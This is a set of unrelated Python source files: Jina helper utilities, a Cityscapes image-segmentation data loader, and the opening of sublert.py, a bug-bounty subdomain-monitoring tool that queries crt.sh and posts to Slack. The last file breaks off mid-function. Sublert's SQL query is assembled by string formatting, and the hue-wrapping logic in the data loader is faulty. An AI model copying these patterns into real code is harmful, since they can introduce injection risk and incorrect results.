asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
if 'JINA_DISABLE_UVLOOP' not in os.environ:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
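# --- Illustrative usage sketch (not part of the original module) ---
# cached_property computes a value once per instance and reuses it afterwards;
# the class below is made up for illustration and the helper is never called.
def _example_cached_property_usage():
    class _Expensive:
        @cached_property
        def value(self):
            print('computing...')
            return 42
    obj = _Expensive()
    first, second = obj.value, obj.value  # 'computing...' is printed only once
    return first, second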
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
    Return the private IP address of the gateway, for connecting from other machines on the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip():
"""
    Return the public IP address of the gateway, for connecting from other machines on the public network.
:return: Public IP address.
"""
import urllib.request
timeout = 0.2
results = []
def _get_ip(url):
try:
with urllib.request.urlopen(url, timeout=timeout) as fp:
results.append(fp.read().decode('utf8'))
except:
pass
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://ipinfo.io/ip',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
    Check if we're running in a Jupyter notebook, using the magic command `get_ipython` that is only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
    When running inside Jupyter, an event loop already exists and cannot be stopped or killed.
    Directly calling asyncio.run will then fail, because asyncio.run cannot be called when another
    asyncio event loop is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use AsyncClient/AsyncFlow instead of Client/Flow. If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
@contextmanager
def change_cwd(path):
"""
    Change the current working dir to ``path`` in a context and set it back to the original one when leaving the context.
:param path: Target path.
:yields: nothing
"""
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
@contextmanager
def change_env(key, val):
"""
    Change the environment of ``key`` to ``val`` in a context and set it back to the original one when leaving the context.
:param key: Old environment variable.
:param val: New environment variable.
:yields: nothing
"""
old_var = os.environ.get(key, None)
os.environ[key] = val
try:
yield
finally:
        if old_var is not None:
os.environ[key] = old_var
else:
os.environ.pop(key)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
    r = r'^[/\w\-\_\.]+\.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def _canonical_request_name(req_name: str):
"""Return the canonical name of a request
:param req_name: the original request name
:return: canonical form of the request
"""
if req_name.startswith('/'):
# new data request
return f'data://{req_name}'
else:
# legacy request type
return req_name.lower().replace('request', '')
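# --- Illustrative usage sketch (not part of the original module) ---
# How _canonical_request_name maps both new-style endpoints and legacy request
# type names; the helper is never called by the module itself.
def _example_canonical_request_name():
    assert _canonical_request_name('/index') == 'data:///index'
    assert _canonical_request_name('SearchRequest') == 'search'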
def physical_size(directory: str) -> int:
"""Return the size of the given directory in bytes
:param directory: directory as :str:
:return: byte size of the given directory
"""
root_directory = Path(directory)
return sum(f.stat().st_size for f in root_directory.glob('**/*') if f.is_file())
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
    key 'b' can be referenced as 'a__b'
    :param _dict: (dict, list, struct or object) which we want to index into
    :param key: (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import Struct
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
|
data.py
|
"""Contains classes for loading and augmenting data."""
from __future__ import absolute_import
from __future__ import division
import cv2
import abc
import numpy as np
import six
import multiprocessing
import logging
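# Standard Cityscapes mapping from raw label IDs to the 19 training class IDs;
# 255 marks classes that are ignored (void) during training.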
cityscapes_value_map = {0: 255, 1: 255, 2: 255, 3: 255, 4: 255, 5: 255, 6: 255,
7: 0, 8: 1, 9: 255, 10: 255, 11: 2, 12: 3, 13: 4,
14: 255, 15: 255, 16: 255, 17: 5, 18: 255, 19: 6, 20: 7,
21: 8, 22: 9, 23: 10, 24: 11, 25: 12, 26: 13, 27: 14,
28: 15, 29: 255, 30: 255, 31: 16, 32: 17, 33: 18}
class DataLoader(object):
"""Loads data from disk and applies augmentation."""
def __init__(self, uri_queue, augmentor, image_loader, target_loader):
"""Initializes a new instance of the DataLoader class.
Args:
uri_queue: A queue that contains the data uris.
augmentor: An instance of `Augmentor`.
image_loader: An instance of `Loader` for loading the image.
target_loader: An instance of `Loader` for loading the labels.
"""
self._uri_queue = uri_queue
self._augmentor = augmentor
self._image_loader = image_loader
self._target_loader = target_loader
def get_pair(self):
"""Loads a new image annotation pair.
Returns:
A tuple consisting of the image and its annotation.
"""
image_file, target_file = self._uri_queue.get()
image = self._image_loader.load(image_file)
target = self._target_loader.load(target_file)
if self._augmentor is not None:
image, target = self._augmentor.augment(image, target)
return image, target
class BatchLoader(object):
"""Loads batches of data and puts them into a queue."""
def __init__(self, data_loader, queue, batch_size, num_classes):
"""Initializes a new instance of the BatchLoader class.
Args:
data_loader: The underlying data loader.
queue: The queue to push examples into.
batch_size: The batch size.
"""
self._data_loader = data_loader
self._queue = queue
self._batch_size = batch_size
self._num_classes = num_classes
self.start_loading()
def start_loading(self):
"""Starts loading images in an infinite loop."""
# Choose a new numpy random seed. Otherwise all processes use the same
# seed.
np.random.seed()
while True:
images, targets = self.load_batch()
self._queue.put((images, targets))
def load_batch(self):
"""Loads a single batch of images.
Returns:
A tuple of `images` and `targets`.
"""
data = [self._data_loader.get_pair() for _ in range(self._batch_size)]
# Convert the image from H, W, C and BGR to C, H, W and RGB.
images = [self._convert_image(d[0]) for d in data]
targets = [self._convert_target(d[1]) for d in data]
images = np.stack(images, axis=0)
targets = np.stack(targets, axis=0)
return images, targets
def _convert_image(self, image):
"""Converts the image to the desired format."""
image = np.rollaxis(image[:, :, ::-1], 2)
image = np.nan_to_num(image)
return image
def _convert_target(self, target):
"""Converts the target to int32 and replaces void labels by -1.
Args:
target: The target image.
Returns:
The converted target image.
"""
target = target.astype("int32")
target[target == 255] = self._num_classes
flat_targets = target.flatten()
class_matrix = np.eye(self._num_classes + 1, dtype='float32')
# Select the one-hot row for each example.
selects = class_matrix[flat_targets]
# Get back a properly shaped tensor.
new_shape = target.shape + (self._num_classes + 1, )
new_target = np.reshape(selects, new_shape )
new_target = new_target[:, :, :self._num_classes]
new_target = new_target.transpose((2, 0, 1))
return new_target
class DataProvider(object):
"""Client class for loading data asynchronously."""
def __init__(self,
augmentor,
image_loader,
target_loader,
data_iterator,
batch_size,
num_classes,
threads=3,
prefetch_batches=10):
"""Initializes a new instance of the DataProvider class.
Args:
augmentor: A dataset augmentor.
image_loader: Loader for loading the images.
            target_loader: Loader for loading the targets.
data_iterator: Data sequence iterator.
batch_size: The batch size.
num_classes: The number of classes.
threads: The number of loader threads.
prefetch_batches: The number of batches to prefetch.
"""
# Create the queue for feeding the data uris.
uri_queue = multiprocessing.Queue(maxsize=threads * prefetch_batches)
# Fill the queue.
p = multiprocessing.Process(
target=data_iterator.fill_queue, args=(uri_queue, ))
p.daemon = True
p.start()
# Create the data loader.
loader = DataLoader(uri_queue, augmentor, image_loader, target_loader)
# Create the data queue.
self._queue = multiprocessing.Queue(maxsize=prefetch_batches)
# Launch the loader.
for _ in range(threads):
args = (loader, self._queue, batch_size, num_classes)
p = multiprocessing.Process(target=BatchLoader, args=args)
p.daemon = True
p.start()
self._data_iterator = data_iterator
self._batch_size = batch_size
def get_num_batches(self):
"""Returns the number of batches."""
return self._data_iterator.get_sequence_length() // self._batch_size
def reset(self):
"""Resets the data iterator.
        This functionality is not supported in Python.
"""
logging.warning("Resetting the data provider is not supported in "
"Python. Please consider using the C++ chianti library "
"for training.")
def next(self):
"""Returns the next batch.
Returns:
A tuple consisting of image and target.
"""
return self._queue.get()
@six.add_metaclass(abc.ABCMeta)
class LoaderBase(object):
"""Instances of this class load images from a given resource identifier."""
@abc.abstractmethod
def load(self, uri):
"""Loads an image from a given resource identifier.
Args:
uri: The resource identifier.
Returns:
An image as numpy array.
"""
class RGBLoader(LoaderBase):
"""Loads an RGB image from the local disk."""
def load(self, uri):
"""Loads an image from a given resource identifier.
Args:
uri: The resource identifier.
Returns:
An image as numpy array.
"""
img = cv2.imread(uri, 1).astype('float32')
img = img / 255.0
return img
class ValueMapperLoader(LoaderBase):
"""Loads a gray scale image from disk and applies a value mapping."""
def __init__(self, intensity_map):
"""Initializes a new instance of the ValueMapperLoader class.
Args:
intensity_map: The intensity map.
"""
super(ValueMapperLoader, self).__init__()
self._intensity_map = intensity_map
self._map_func = np.vectorize(lambda px: self._intensity_map[px])
def load(self, uri):
"""Loads an image from a given resource identifier.
Args:
uri: The resource identifier.
Returns:
An image as numpy array.
"""
img = cv2.imread(uri, 0)
img = self._map_func(img)
return img
@six.add_metaclass(abc.ABCMeta)
class IteratorBase(object):
"""Allows to iterate over sequences in different orders."""
def __init__(self, sequence):
"""Initializes a new instance of the IteratorBase class.
Args:
sequence: The sequence to iterate over.
"""
self._mutex = multiprocessing.Lock()
self._sequence = sequence
if not self._sequence:
raise ValueError("Empty iteration sequence.")
def fill_queue(self, queue):
"""Fills the queue with the data from the iterator."""
while True:
queue.put(self.next())
def next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
self._mutex.acquire()
result = self._next()
self._mutex.release()
return result
def get_sequence_length(self):
"""Returns the sequence length."""
return len(self._sequence)
@abc.abstractmethod
def reset(self):
"""Resets the iterator for deterministic iteration."""
pass
@abc.abstractmethod
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
class SequentialIterator(IteratorBase):
"""Iterates over the data in epochs."""
def __init__(self, sequence):
"""Initializes a new instance of the SequentialIterator class.
Args:
sequence: The sequence to iterate over.
"""
super(SequentialIterator, self).__init__(sequence)
self._index = 0
def reset(self):
"""Resets the iterator for deterministic iteration."""
self._index = 0
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
if self._index == len(self._sequence):
self.reset()
result = self._sequence[self._index]
self._index += 1
return result
class RandomIterator(IteratorBase):
"""Iterates over the data randomly in epochs."""
def __init__(self, sequence):
"""Initializes a new instance of the RandomIterator class.
Args:
sequence: The sequence to iterate over.
"""
super(RandomIterator, self).__init__(sequence)
self._index = 0
self._order = np.arange(len(sequence))
self._shuffle()
def _shuffle(self):
"""Shuffles the current iteration order."""
np.random.shuffle(self._order)
self._index = 0
def reset(self):
"""Resets the iterator for deterministic iteration."""
self._order = np.arange(len(self._sequence))
self._index = 0
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
if self._index == len(self._sequence):
self._shuffle()
result = self._sequence[self._order[self._index]]
self._index += 1
return result
class WeightedRandomIterator(IteratorBase):
"""Randomly samples elements according to a given probability."""
def __init__(self, sequence, weights):
"""Initializes a new instance of the WeightedRandomIterator class.
Args:
sequence: The sequence to iterate over.
weights: The weight of each element in the sequence.
"""
super(WeightedRandomIterator, self).__init__(sequence)
# Make sure that the weights define a probability distribution.
weights += np.min(weights)
weights /= np.sum(weights)
self._weights = weights
self._indices = np.arange(len(self._sequence))
def reset(self):
"""Resets the iterator for deterministic iteration."""
pass
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
index = np.random.choice(self._indices, p=self._weights)
return self._sequence[index]
@six.add_metaclass(abc.ABCMeta)
class AugmentorBase(object):
"""Augments the data."""
@abc.abstractmethod
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
pass
class SubsampleAugmentor(AugmentorBase):
"""Subsamples the image and the target."""
def __init__(self, factor):
"""Initializes a new instance of the SubsampleAugmentor class.
Args:
factor: The sampling factor.
"""
super(SubsampleAugmentor, self).__init__()
self._factor = factor
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
return self._scale_image(image), self._scale_target(target)
def _scale_image(self, image):
"""Downscales the image."""
size = image.shape[1] // self._factor, image.shape[0] // self._factor
return cv2.resize(image, size, interpolation=cv2.INTER_CUBIC)
def _scale_target(self, target):
"""Downscales the target.
This script is based on the following code:
https://github.com/VisualComputingInstitute/cityscapes-util/blob/master/
__init__.py
Copyright (c) Visual Computing Institute RWTH Aachen University
"""
fy, fx = self._factor, self._factor
H, W = target.shape
h, w = H // fy, W // fx
m = np.min(target)
M = np.max(target)
if m == M:
M = m + 1
assert -1 <= m, "Labels should not have values below -1"
        # Count the number of occurrences of the labels in each "fy x fx" cell
label_sums = np.zeros((h, w, M + 2))
mx, my = np.meshgrid(np.arange(w), np.arange(h))
for dy in range(fy):
for dx in range(fx):
label_sums[my, mx, target[dy::fy, dx::fx]] += 1
# "Don't know" don't count.
label_sums = label_sums[:, :, :-1]
        # Use the highest-occurrence label.
new_targets = np.argsort(label_sums, 2)[:, :, -1].astype("uint8")
# But turn "uncertain" cells into "don't know" label.
counts = label_sums[my, mx, new_targets]
hit_counts = np.sum(label_sums, 2) * 0.25
new_targets[counts <= hit_counts] = 255
return new_targets
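# Worked example for the majority-vote downscaling above (illustrative): with
# factor 2, a 2x2 cell holding the labels [3, 3, 5, -1] casts two votes for 3 and
# one for 5; the -1 ("don't know") vote lands in the last histogram bin and is
# discarded. The output pixel becomes 3, since its 2 votes exceed 25% of the 3
# counted votes; a winning label with 25% or fewer of the counted votes is
# written as 255 (void) instead.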
class TranslationAugmentor(AugmentorBase):
"""Translates the image randomly."""
def __init__(self, offset=40):
"""Initializes a new instance of the TranslationAugmentor class.
Args:
offset: The offset by which the image is randomly translated.
"""
self._offset = offset
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample an offset in each direction.
offsets = np.random.randint(-self._offset, self._offset + 1, (2, ))
# Extract the image and the label
image = self._translate_image(image, offsets)
target = self._translate_target(target, offsets)
return image, target
def _translate_image(self, image, offsets):
"""Translates the image and uses reflection padding.
Args:
image: The image to translate.
offsets: The offset in each direction.
Returns:
The translated image.
"""
# Extract the image region that is defined by the offset.
region = image[
max(-offsets[0], 0):image.shape[0] - max(0, offsets[0]),
max(-offsets[1], 0):image.shape[1] - max(0, offsets[1]),
:]
# Pad the image using reflection padding.
padding = (
(max(0, offsets[0]), max(0, -offsets[0])),
(max(0, offsets[1]), max(0, -offsets[1])),
(0, 0)
)
region = np.pad(region, padding, "reflect")
return region
def _translate_target(self, target, offsets):
"""Translates the image and uses constant -1 padding.
Args:
target: The target to translate.
offsets: The offset in each direction.
Returns:
The translated image.
"""
new_target = -1 * np.ones_like(target)
new_target[
max(0, offsets[0]):target.shape[0] + min(0, offsets[0]),
max(0, offsets[1]):target.shape[1] + min(0, offsets[1])] = target[
max(-offsets[0], 0):target.shape[0] - max(0, offsets[0]),
max(-offsets[1], 0):target.shape[1] - max(0, offsets[1])]
return new_target
class GammaAugmentor(AugmentorBase):
"""Performs random gamma augmentation."""
def __init__(self, gamma_range=0.1):
"""Initializes a new instance of the GammaAugmentor class.
Args:
gamma_range: The range from which to sample gamma.
"""
self._gamma_range = gamma_range
assert 0.0 <= self._gamma_range <= 0.5, "Invalid gamma parameter."
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample a gamma factor.
gamma = np.random.uniform(-self._gamma_range, self._gamma_range)
# Apply the non-linear transformation
gamma = np.log(
0.5 + 1 / np.sqrt(2) * gamma) / np.log(0.5 - 1 / np.sqrt(2) * gamma)
# Perform the gamma correction.
image **= gamma
return image, target
class CropAugmentor(AugmentorBase):
"""Randomly extracts crops from the image."""
    def __init__(self, unused_size, unused_num_classes):
"""Initializes a new instance of the CropAugmentor class."""
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
raise NotImplementedError("Crop augmentation is not available in "
"Python. Please install the chianti C++ "
"library.")
class RotationAugmentor(AugmentorBase):
"""Randomly rotates the image."""
def __init__(self, max_angel):
"""Initializes a new instance of the RotationAugmentor class.
Args:
            max_angel: The maximum angle, in degrees, by which the image is rotated.
"""
self._max_angel = max_angel
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample the rotation factor.
factor = np.random.uniform(-self._max_angel, self._max_angel)
if factor < 0:
factor += 360.0
# Get the rotation matrix.
h, w = image.shape[:2]
m = cv2.getRotationMatrix2D((w / 2, h / 2), factor, 1)
image = cv2.warpAffine(image, m, (w, h))
target = cv2.warpAffine(
target, m, (w, h), flags=cv2.INTER_NEAREST,
borderMode=cv2.BORDER_CONSTANT, borderValue=255)
return image, target
class ZoomingAugmentor(AugmentorBase):
"""Randomly zooms into or out of the image."""
def __init__(self, max_factor):
"""Initializes a new instance of the ZoomingAugmentor class.
Args:
            max_factor: The maximum factor by which the image is zoomed.
"""
        self._max_factor = max_factor
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
raise NotImplementedError("Zooming augmentation is only available in "
"the C++ Chianti library.")
class SaturationAugmentor(AugmentorBase):
"""Randomly alters the image saturation."""
def __init__(self, min_delta, max_delta):
"""Initializes a new instance of the SaturationAugmentor class.
Args:
min_delta: Minimum deviation in the color space.
max_delta: Maximum deviation in the color space.
"""
self._min_delta = min_delta
self._max_delta = max_delta
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample the color factor.
factor = np.random.uniform(self._min_delta, self._max_delta)
hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hsv_image[:, :, 1] *= factor
hsv_image[:, :, 1] = np.clip(hsv_image[:, :, 1], 0.0, 1.0)
image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)
return image, target
class HueAugmentor(AugmentorBase):
"""Randomly alters the image hue."""
def __init__(self, min_delta, max_delta):
"""Initializes a new instance of the HueAugmentor class.
Args:
min_delta: Minimum deviation in the color space.
max_delta: Maximum deviation in the color space.
"""
self._min_delta = min_delta
self._max_delta = max_delta
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample the color factor.
factor = np.random.uniform(self._min_delta, self._max_delta)
hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hsv_image[:, :, 0] += factor
# Make sure the values are in [-360, 360].
hsv_image[:, :, 0] += 360 * (hsv_image[:, :, 0] < 360)
hsv_image[:, :, 0] -= 360 * (hsv_image[:, :, 0] > 360)
image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)
return image, target
class CombinedAugmentor(AugmentorBase):
"""Combines multiple augmentors into once."""
def __init__(self, augmentors):
"""Initializes a new instance of the CombinedAugmentor class.
Args:
augmentors: A list of augmentors.
"""
self._augmentors = augmentors
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
for augmentor in self._augmentors:
image, target = augmentor.augment(image, target)
return image, target
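if __name__ == "__main__":
    # Minimal smoke test / usage sketch (not part of the original module): run two
    # of the augmentors above on synthetic data so that no Cityscapes files or
    # multiprocessing setup are needed.
    synthetic_image = np.random.uniform(0.0, 1.0, (64, 64, 3)).astype("float32")
    synthetic_target = np.random.randint(0, 19, (64, 64)).astype("int32")
    augmentor = CombinedAugmentor([
        TranslationAugmentor(offset=8),
        GammaAugmentor(gamma_range=0.05),
    ])
    aug_image, aug_target = augmentor.augment(synthetic_image, synthetic_target)
    print("augmented image:", aug_image.shape, "augmented target:", aug_target.shape)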
|
sublert.py
|
#!/usr/bin/env python
# coding: utf-8
# Announced and released during OWASP Seasides 2019 & NullCon.
# Huge shout out to the Indian bug bounty community for their hospitality.
import argparse
import dns.resolver
import sys
import requests
import json
import difflib
import os
import re
import psycopg2
from tld import get_fld
from tld.utils import update_tld_names
from termcolor import colored
import threading
is_py2 = sys.version[0] == "2"  # detect Python 2 so the Queue module is imported under the correct name
if is_py2:
import Queue as queue
else:
    import queue
import config as cfg
import time
from db.SLDB import *
version = "1.4.7"
requests.packages.urllib3.disable_warnings()
def banner():
print('''
_____ __ __ __
/ ___/__ __/ /_ / /__ _____/ /_
\__ \/ / / / __ \/ / _ \/ ___/ __/
___/ / /_/ / /_/ / / __/ / / /_
/____/\__,_/_.___/_/\___/_/ \__/
''')
print(colored(" Author: Yassine Aboukir (@yassineaboukir)", "red"))
print(colored(" Version: {}", "red").format(version))
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-u','--url',
dest = "target",
help = "Domain to monitor. E.g: yahoo.com",
required = False)
parser.add_argument('-d', '--delete',
dest = "remove_domain",
help = "Domain to remove from the monitored list. E.g: yahoo.com",
required = False)
parser.add_argument('-t', '--threads',
dest = "threads",
help = "Number of concurrent threads to use. Default: 20",
type = int,
default = 20)
parser.add_argument('-r', '--resolve',
dest = "resolve",
help = "Perform DNS resolution.",
required=False,
nargs='?',
const="True")
parser.add_argument('-l', '--logging',
dest = "logging",
help = "Enable Slack-based error logging.",
required=False,
nargs='?',
const="True")
parser.add_argument('-a', '--list',
dest = "listing",
help = "Listing all monitored domains.",
required = False,
nargs='?',
const="True")
parser.add_argument('-m', '--reset',
dest = "reset",
help = "Reset everything.",
nargs='?',
const="True")
return parser.parse_args()
def domain_sanity_check(domain): #Verify the domain name sanity
if domain:
try:
domain = get_fld(domain, fix_protocol = True)
return domain
except:
print(colored("[!] Incorrect domain format. Please follow this format: example.com, http(s)://example.com, www.example.com", "red"))
sys.exit(1)
else:
pass
def slack(data): #posting to Slack
webhook_url = cfg.slack['posting_webhook']
slack_data = {'text': data}
response = requests.post(
webhook_url,
data = json.dumps(slack_data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 200:
error = "Request to slack returned an error {}, the response is:\n{}".format(response.status_code, response.text)
errorlog(error, enable_logging)
if cfg.slack['sleep_enabled']:
time.sleep(1)
def reset(do_reset): #clear the monitored list of domains and remove all locally stored files
if do_reset:
sldb.delete_all_domains()
print(colored("\n[!] Sublert was reset successfully. Please add new domains to monitor!", "red"))
sys.exit(1)
else: pass
def remove_domain(domain_to_delete): #remove a domain from the monitored list
new_list = []
if domain_to_delete:
if sldb.domain_exists(domain_to_delete):
sldb.delete_domain(domain_to_delete)
print(colored("\n[-] {} was successfully removed from the monitored list.".format(domain_to_delete), "green"))
else:
print(colored("\n[!] {} - Not found".format(domain_to_delete), "red"))
sys.exit(1)
def domains_listing(): #list all the monitored domains
global list_domains
if list_domains:
domains = sldb.get_all_domains()
if len(domains) > 0 :
print(colored("\n[*] Below is the list of monitored domain names:\n", "green"))
for domain in domains:
print(colored("{}".format(domain.replace("\n", "")), "yellow"))
else:
print(colored("\n[!] The domain monitoring list is currently empty\n", "red"))
sys.exit(1)
def errorlog(error, enable_logging): #log errors and post them to slack channel
if enable_logging:
print(colored("\n[!] We encountered a small issue, please check error logging slack channel.", "red"))
webhook_url = cfg.slack['errorlogging_webhook']
slack_data = {'text': '```' + error + '```'}
response = requests.post(
webhook_url,
data = json.dumps(slack_data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 200:
error = "Request to slack returned an error {}, the response is:\n{}".format(response.status_code, response.text)
errorlog(error, enable_logging)
else: pass
class cert_database(object):  # retrieves subdomains from the crt.sh database, falling back to its public API
global enable_logging
def lookup(self, domain, wildcard = True):
try:
try: #connecting to crt.sh postgres database to retrieve subdomains.
unique_domains = set()
domain = domain.replace('%25.', '')
conn = psycopg2.connect("dbname={0} user={1} host={2}".format(cfg.crtsh['name'], cfg.crtsh['user'], cfg.crtsh['host']))
conn.autocommit = True
cursor = conn.cursor()
cursor.execute("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%{}'));".format(domain))
